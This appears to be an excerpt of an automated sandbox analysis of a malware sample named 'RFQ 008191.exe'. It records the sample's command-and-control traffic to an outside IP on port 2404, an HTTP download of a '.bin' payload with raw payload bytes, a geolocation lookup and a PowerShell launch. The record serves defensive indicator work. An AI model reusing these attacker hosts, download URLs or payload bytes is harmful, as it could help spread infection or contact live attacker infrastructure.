                                                                  Dec 10, 2024 16:29:06.119271040 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.119308949 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.120059967 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.120202065 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.120245934 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.121017933 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.121139050 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.121179104 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.121907949 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.122061014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.122102976 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.122869968 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.123008966 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.123045921 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.123847961 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.124002934 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.124047995 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.125017881 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125150919 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125189066 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.125818014 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125935078 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.125972986 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.126779079 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.126915932 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.126949072 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.127825975 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.127966881 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.127995968 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.128784895 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.128935099 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.128981113 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.129745007 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.129873991 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.129914045 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.130662918 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.130805016 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.130836964 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.131691933 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.131776094 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.131815910 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.132642031 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.132797956 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.132844925 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.133578062 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.133707047 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.133753061 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.134692907 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.134790897 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.134836912 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.135579109 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.135684013 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.135724068 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.136842012 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.136969090 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137023926 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.137552977 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137691975 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.137727976 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.138415098 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.138552904 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.138588905 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.139602900 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.139664888 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.139718056 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.140403986 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.140536070 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.140585899 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.141374111 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.141511917 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.141565084 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.142590046 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.142724037 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.142765999 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.143671036 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.143815994 CET240449799212.162.149.91192.168.2.7
                                                                  Dec 10, 2024 16:29:06.143852949 CET497992404192.168.2.7212.162.149.91
                                                                  Dec 10, 2024 16:29:06.267997980 CET240449799212.162.149.91192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 16:29:06.268182993 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.268243074 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.268392086 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.268533945 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.268573999 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.269293070 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.269706964 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.269752979 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.269819975 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.270618916 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.270668983 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.270751953 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.271809101 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.271821976 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.271856070 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.272587061 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.272628069 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.272730112 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.273582935 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.273627043 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.273693085 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.274512053 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.274555922 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.274647951 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.275774956 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.275821924 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.276031971 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.276935101 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.276976109 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.277061939 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.277875900 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.277924061 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.277951956 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.278799057 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.278842926 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.278983116 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.279844046 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.279891968 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.280052900 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.280735016 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.280775070 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:06.280864954 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.281528950 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:06.281565905 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.193528891 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.313169003 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313224077 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313226938 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.313235998 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313277006 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.313277960 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.313293934 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:09.313461065 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313472986 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313482046 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313492060 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313502073 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313517094 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.313527107 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432684898 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432725906 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432745934 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432756901 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432785034 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.432831049 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.433286905 CET | 2404 | 49799 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:09.433343887 CET | 49799 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:24.488830090 CET | 2404 | 49793 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:24.502633095 CET | 49793 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:24.624699116 CET | 2404 | 49793 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:54.563580990 CET | 2404 | 49793 | 212.162.149.91 | 192.168.2.7
Dec 10, 2024 16:29:54.576924086 CET | 49793 | 2404 | 192.168.2.7 | 212.162.149.91
Dec 10, 2024 16:29:54.696402073 CET | 2404 | 49793 | 212.162.149.91 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 16:29:03.136287928 CET | 58041 | 53 | 192.168.2.7 | 1.1.1.1
Dec 10, 2024 16:29:03.286854029 CET | 53 | 58041 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 16:29:03.136287928 CET | 192.168.2.7 | 1.1.1.1 | 0x41df | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 16:29:03.286854029 CET | 1.1.1.1 | 192.168.2.7 | 0x41df | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                  • 212.162.149.89
                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49784 | 212.162.149.89 | 80 | 7864 | C:\Users\user\AppData\Local\Temp\Juryen.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:28:57.611057043 CET | 174 | OUT | GET /wwVHOGRH148.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: 212.162.149.89
Cache-Control: no-cache
Dec 10, 2024 16:28:58.760035038 CET | 1236 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Dec 2024 10:02:23 GMT
Accept-Ranges: bytes
ETag: "d2c1ec9bea4adb1:0"
Server: Microsoft-IIS/8.5
Date: Tue, 10 Dec 2024 15:28:58 GMT
Content-Length: 493120
                                                                  Data Raw: 11 88 57 36 80 d4 0d 32 96 cb f6 f0 b5 2d 73 e3 7e 14 a8 21 e4 c2 1f 3d ad 7b 12 a0 2d 91 c5 1f e9 b6 34 38 94 7b 0f 43 87 13 a1 a2 f3 d7 20 28 3b 15 d9 3b 60 73 0c bf 79 b1 35 a5 22 25 c3 0b 7e b0 a0 04 af b7 ae 6c d6 e5 a7 2d ae c6 1f 8e 9b da 1c a0 72 cc 78 e6 c5 7b ec 0b 43 19 b6 b4 77 50 f5 f2 b1 7f b9 4e a8 73 82 d3 57 97 08 a1 6a 35 49 a9 86 6f d1 35 27 93 31 0a 69 e1 88 b7 17 5e e8 89 38 2d 6b 98 bc e4 49 1b 33 5c d5 3d cf 24 57 0e 2b 43 d0 7d 39 44 11 07 1e ca 25 4d 59 50 b6 23 3b 9d 7f b2 4c 0b 97 30 16 92 5f 43 fb ea a6 56 a2 f0 a0 81 a1 c6 17 02 a7 c9 6e 44 55 40 95 c7 85 09 d6 d4 e8 71 48 ce b3 2a b3 e8 ee 1c d6 f0 31 69 78 0e 22 51 d0 a5 5e 0c da 4b dd 96 f4 9e 15 64 92 8b 58 ed 24 56 d3 d0 62 e4 5b f7 4f 42 8d d9 38 f3 cf aa 37 b8 b2 0e 5b a8 ac 5c fe 9c 16 38 df 49 41 68 8e 12 37 bf e7 6b 97 b5 ff c9 36 c4 dc 24 b0 d6 b4 14 28 0a 53 40 aa 55 24 db f9 f2 f2 a8 5d 38 43 d3 b2 45 b6 95 c7 b6 91 31 c7 25 55 80 23 45 ab ae a5 8c 9e 40 c9 cd aa 20 fc e5 aa dd 6f bd 4d ff 96 ee d2 cd c9 14 [TRUNCATED]
                                                                  Data Ascii: W62-s~!={-48{C (;;`sy5"%~l-rx{CwPNsWj5Io5'1i^8-kI3\=$W+C}9D%MYP#;L0_CVnDU@qH*1ix"Q^KdX$Vb[OB87[\8IAh7k6$(S@U$]8CE1%U#E@ oM ]m6rzuL4}n4q3VZ!+d*.rc{*_tZ|EEEvfO'm-ev35<:=nayC=~q{S@kZ7V/2g]-8HL[v%B_}j7,+"{B(w#0I!F$qH^Cpj{rb3/x4uONY;z#vXTHw8_S!gmxl%B#~xP=s/fZ"Mh?xba^1KnVOH& U \RX[?RHI- M:vO{hQrbX`CNM=OSgv#ouUCp;R|@F)E{pc<)gwieF:@H@,d"E`bkH\U-[ba0^ctZ4ytJR2pkM<yW\<^+|B*37<#Er|`c)O3,N8?
Dec 10, 2024 16:28:58.760165930 CET | 1236 | IN | Data Raw: c4 f2 ea 3f 2d ee 26 bc f1 8d f6 d0 65 67 d9 d2 d0 3f 78 e4 77 c3 63 6e 0d 43 d2 45 20 d3 93 fe 79 aa bb 10 5f 48 d1 4c ef 96 b6 eb f5 62 6f 47 59 3c 71 dd 5d f4 11 51 81 b1 1b 0c ae 2d 40 11 8a 45 3d cb 98 1b 7e 12 77 e2 90 86 31 af ed 34 bf 8e
                                                                  Data Ascii: ?-&eg?xwcnCE y_HLboGY<q]Q-@E=~w14yh gD+iU7u-^K@<c\.cg9'$nJ;1.aYdlzP&x&q(oeqx^_.1cASMso4
Dec 10, 2024 16:28:58.760178089 CET | 1236 | IN | Data Raw: e1 14 63 02 3f c1 c7 2c 26 c8 f4 f8 72 af 31 91 f2 00 13 87 28 19 6c 25 17 57 b5 9f b2 77 15 a6 b0 df f7 ef 5b 85 40 bc 4f d5 9b a1 76 80 53 58 c3 a4 8f 01 98 85 a1 06 92 2d c6 48 80 14 90 76 73 00 1e e6 b4 4d c8 3b e4 4b 4a db 25 f4 cb 2e 73 d7
                                                                  Data Ascii: c?,&r1(l%Ww[@OvSX-HvsM;KJ%.svQ1@%Ss!Jc4S*=w0CgL1Rc9@DsEpr|[pDw0TRAcKDkdmE9'`'Kd+arbu^;y4|.!V)
Dec 10, 2024 16:28:58.760736942 CET | 1236 | IN | Data Raw: 22 29 3f f6 2f 8c 40 c6 32 e2 8c 89 35 c3 36 fc 7f 97 05 be a7 f1 a9 d1 05 b7 c2 aa fe 06 a3 b6 bf 7c 39 3a 8d b9 c2 27 24 79 7d 77 21 f2 f4 b6 5d a0 61 ec bd 1f 7d 8c b6 1d fc 05 69 6d 61 29 77 2d 76 fd 1a 1e 6b 1c 08 d7 8d 7d 98 ef fc eb 7e ef
                                                                  Data Ascii: ")?/@256|9:'$y}w!]a}ima)w-vk}~Ed.|t[:[{KbNSF~2r{SZ[$S-8SHC{y)^A5J#)s@&8<B93;=!"qn$$1'UZi8Qx
Dec 10, 2024 16:28:58.760750055 CET | 896 | IN | Data Raw: 66 84 4f 65 0d b4 6f 01 e5 e3 ab 78 1a 37 34 de b7 b0 d4 27 67 37 37 83 94 42 7d eb 46 1e 93 a7 6e 51 1f 3d d6 d7 ce fd 02 7a 07 ac b7 25 aa 8c 2c 65 29 51 6f 94 7f cb 48 1e a0 72 47 b6 0e 8b 78 ec 0b c8 df e8 77 21 db 04 1a 3a 7b b9 4e 23 27 a6
                                                                  Data Ascii: fOeox74'g77B}FnQ=z%,e)QoHrGxw!:{N#'Y3q=A6l5~EgK~8<\}n|Y,}@wL -p_4:`V53?Mfa"c{4,9,!KID7m~,*DA@Y!jCB!
Dec 10, 2024 16:28:58.789952040 CET | 1236 | IN | Data Raw: 23 9a b2 64 c0 49 af fa 91 74 49 a3 c3 07 7b 62 b2 28 c6 f2 cd fd 1c 23 1c 22 c8 66 9f db e4 b1 6b 69 3f 63 02 ba 51 ec 96 26 04 bc 94 fb 51 3f 42 40 63 63 75 e8 c8 ab 68 f0 b0 d9 b8 2c c4 48 c7 0c 5a 05 f7 e4 46 a8 d0 c4 71 8c 2f 2d 63 63 43 a1
                                                                  Data Ascii: #dItI{b(#"fki?cQ&Q?B@ccuh,HZFq/-ccC1qh=w+Z=,!WA/3'GlMudQ+nQ4q9@Ag[CBt:X%; tjf8<86bR:R.~`j{}1W/w;5
Dec 10, 2024 16:28:58.790045023 CET | 1236 | IN | Data Raw: d2 31 73 d6 f2 fe 4b 52 e3 88 d4 0f 49 9f dd b4 ce 65 8e 02 13 59 2b 28 ae af 6c 98 73 de 98 94 38 94 a8 d8 f4 12 ae ac e5 d2 96 77 f1 78 50 92 64 0d 92 49 d9 88 c6 57 d9 68 7e b6 81 0b a8 26 70 5f ef 7f d9 36 07 05 9f a5 69 a8 70 6f 87 4b 40 69
                                                                  Data Ascii: 1sKRIeY+(ls8wxPdIWh~&p_6ipoK@i 9^hfV_l%/?.xM1z*KR:boLT+C<F>Ki5Lr-oCsr#6rLQ3uqC~Lg!F>uJKl/o|1@
Dec 10, 2024 16:28:58.790059090 CET | 1236 | IN | Data Raw: 1a bb 73 71 f7 24 61 18 c7 cd 31 a2 3c 8a 22 1c 59 c8 45 d4 06 1e 4e 8d 45 f2 f2 90 e9 90 b3 5a 4c 32 49 94 37 21 7a 20 7a e7 3b b8 3c 8d e9 8a a9 ff 0e 8a 8e 68 10 0f 06 25 10 5a 89 86 a5 8d 8f 1b c7 7d df a2 ef 3d 17 a2 56 58 1e b9 74 42 b4 b7
                                                                  Data Ascii: sq$a1<"YENEZL2I7!z z;<h%Z}=VXtB"0,h0Z9!:]]:\^gDT"M%km-U;=,%4*VPl'S1=n)W"$4OC2s%O,J4
Dec 10, 2024 16:28:58.790497065 CET | 1236 | IN | Data Raw: e0 f3 97 94 f9 ef fc 85 94 fa 2d ce 4a d1 bc e3 16 27 e2 f6 53 b8 df 64 86 e3 fd 38 17 14 1b 8b 33 01 08 bf 23 bc 66 4a 09 de 39 78 f4 15 26 87 46 8d f4 9a 48 93 bd 76 2b 83 86 44 8d 9d e2 61 32 43 18 32 2b 21 32 a6 d8 11 07 1a d4 b5 9e 9c 89 4d
                                                                  Data Ascii: -J'Sd83#fJ9x&FHv+Da2C2+!2MxB@C>RG4oFF$X'$3/oHIS`~?KsQ9Ib9`aN#qf "*i1P<_\={~++.2?;R_6l*cRB
Dec 10, 2024 16:28:58.790509939 CET | 1236 | IN | Data Raw: 51 c1 32 ba 71 85 b2 11 96 21 12 e5 08 b8 a5 05 f6 0e af 6c 2f b3 c2 b8 9d ca 01 9b 08 a0 c8 20 ee 3b 9d fa aa b2 64 7b a2 80 b5 9e 71 56 6d e3 63 1a 4b d6 da ec 03 d9 7e 6c ac 60 0b 35 8a 56 9d 82 fe e3 85 22 62 6e e4 48 0a 76 4d cb 9e 28 c5 e9
                                                                  Data Ascii: Q2q!l/ ;d{qVmcK~l`5V"bnHvM(2pk<-zTUc>=&$q&C&&"/3YQ}}5IK;0XsSr9/h>lpJ_e%;q5pB;(z
Dec 10, 2024 16:28:58.880290031 CET | 1236 | IN | Data Raw: 62 7a 35 6e 09 c2 0f ed 5d de d9 37 93 e3 1c e6 5b ed ee 0b 24 9e 5d bb 90 8b a9 bf 41 cb 8d e5 ce da 74 09 f2 df aa 9a 4a 83 d7 bc 52 97 86 cb c6 41 1b 3d f6 79 bf 3c 8c 7b a5 f8 d8 49 25 7f 34 5b 55 bd d8 a1 d4 da bc 9e 67 12 90 3e 17 61 32 ab
                                                                  Data Ascii: bz5n]7[$]AtJRA=y<{I%4[Ug>a2$7j;t{r,QBWe%cI=]>d8}\1eg]r'{ ;U0i$o!uWQiq}4x3m4^6W noSBt`;([ku


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49801 | 178.237.33.50 | 80 | 7864 | C:\Users\user\AppData\Local\Temp\Juryen.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:29:03.413048029 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 10, 2024 16:29:04.654165030 CET | 1190 | IN | HTTP/1.1 200 OK
                                                                  date: Tue, 10 Dec 2024 15:29:04 GMT
                                                                  server: Apache
                                                                  content-length: 963
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  connection: close
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  Target ID:0
                                                                  Start time:10:28:04
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\RFQ 008191.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:10:28:05
                                                                  Start date:10/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
